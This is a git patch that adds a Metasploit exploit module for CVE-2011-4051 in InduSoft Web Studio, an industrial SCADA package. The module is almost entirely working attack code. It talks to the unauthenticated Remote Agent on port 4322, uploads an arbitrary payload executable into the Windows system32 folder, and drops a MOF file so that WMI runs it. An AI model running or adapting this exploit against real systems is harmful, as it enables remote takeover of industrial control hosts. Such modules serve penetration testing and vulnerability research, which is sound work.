From 24037ac79ac3803bdef24729df7738a04562698f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 3 Oct 2012 16:03:36 +0200 Subject: [PATCH] Added module for CVE-2011-4051 --- .../windows/scada/indusoft_webstudio_exec.rb | 196 ++++++++++++++++++ 1 file changed, 196 insertions(+) create mode 100644 modules/exploits/windows/scada/indusoft_webstudio_exec.rb diff --git a/modules/exploits/windows/scada/indusoft_webstudio_exec.rb b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb new file mode 100644 index 0000000000..9b66fa8f5d --- /dev/null +++ b/modules/exploits/windows/scada/indusoft_webstudio_exec.rb @@ -0,0 +1,196 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'InduSoft Web Studio Remote Code Execution', + 'Description' => %q{ + This module exploits a lack of authentication and authorization on the InduSoft + Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to + the filesystem, by abusing the functions provided by the software. + + The module uses uses the Windows Management Instrumentation service to execute an + arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre + Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows + XP SP3 and Windows 2003 SP2. + }, + 'Author' => + [ + 'Luigi Auriemma', # Vulenrability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2011-4051' ], + [ 'OSVDB', '77179' ], + [ 'BID', '50675' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-330' ] + ], + 'Privileged' => true, + 'Payload' => + { + 'BadChars' => "", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP / 2003', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 04 2011')) + + register_options([Opt::RPORT(4322)], self.class) + end + + def check + connect + + # Get Application version + data = [0x14].pack("C") + sock.put(data) + app_info = sock.get_once + disconnect + + if app_info =~ /InduSoft Web Studio v6.1/ + return Exploit::CheckCode::Vulnerable + elsif app_info =~ /InduSoft Web Studio/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + + end + + def upload_file(filename, my_payload) + connect + + # Get Application version + data = [0x14].pack("C") + sock.put(data) + app_info = sock.get_once + if app_info !~ /InduSoft Web Studio/ + print_error("#{@peer} - InduSoft Web Sutio hasn't been detected, trying to exploit anyway...") + end + + # Get Operating System + data = [0x13].pack("C") + sock.put(data) + os_info = sock.get_once + if os_info !~ /WINXP/ and os_info !~ /WIN2K3/ + print_error("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...") + end + + # Upload file + + data = "\x02\x37" # Command => Select destination + data << [my_payload.length].pack("V") # Data length + data << "#{filename}" # File name to upload + data << "\x09\x00\x30\x00\x00\x00" + data << "\x10\x03" # End of packet + + # The data must be split on 1024 length chunks + offset = 0 # Data to send + count = 1 # Number of chunks sent + groups = 0 # Data must be sent in groups of 50 chunks + + chunk = my_payload[offset, 1024] + + while not chunk.nil? + + # If there is a group of chunks, send it + if count % 51 == 0 + + data << "\x02\x2c" # Command => Send group of chunks + my_count = [count].pack("V") # Number of chunks + data << my_count.gsub(/\x10/, "\x10\x10") + data << "\x10\x03" # End of packet + + sock.put(data) + res = sock.get_once + if res !~ /\x02\x06\x10\x03/ + return res + end + + count = count + 1 + groups = groups + 1 + data = "" + + end + + pkt = [ 0x02, 0x2e ].pack("C*") # Command => Chunk Data + my_count = [count].pack("V") + pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID + pkt << [chunk.length].pack("V").gsub(/\x10/, "\x10\x10") # Chunk Data length + pkt << chunk.gsub(/\x10/, "\x10\x10") # Chunk Data + pkt << "\x10\x03" # End of packet + + data << pkt + offset = (count - groups) * 1024 + chunk = my_payload[offset, 1024] + count = count + 1 + end + + pkt = [ 0x02, 0x03].pack("C*") # Command => End of File + my_count = [count].pack("V") + pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID + pkt << rand_text_alpha(8) # LastWriteTime + pkt << rand_text_alpha(8) # LastAccessTime + pkt << rand_text_alpha(8) # CreationTime + pkt << "\x20\x00\x00\x00" # FileAttributes => FILE_ATTRIBUTE_ARCHIVE (0x20) + pkt << rand_text_alpha(1) + pkt << "\x10\x03" # End of packet + data << pkt + + sock.put(data) + res = sock.get_once + disconnect + + return res + + end + + def exploit + + @peer = "#{rhost}:#{rport}" + + exe = generate_payload_exe + exe_name = rand_text_alpha(rand(10)+5) + '.exe' + + mof_name = rand_text_alpha(rand(10)+5) + '.mof' + mof = generate_mof(mof_name, exe_name) + + print_status("#{@peer} - Uploading the exe payload to C:\\WINDOWS\\system32\\#{exe_name}") + res = upload_file("C:\\WINDOWS\\system32\\#{exe_name}", exe) + if res =~ /\x02\x06\x10\x03/ + print_good "#{@peer} - The exe payload has been uploaded successfully" + else + print_error "#{@peer} - Error uploading the exe payload" + return + end + + print_status("#{@peer} - Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}") + res = upload_file("c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) + if res =~ /\x02\x06\x10\x03/ + print_good "#{@peer} - The mof file has been uploaded successfully" + else + print_error "#{@peer} - Error uploading the mof file" + return + end + + end + +end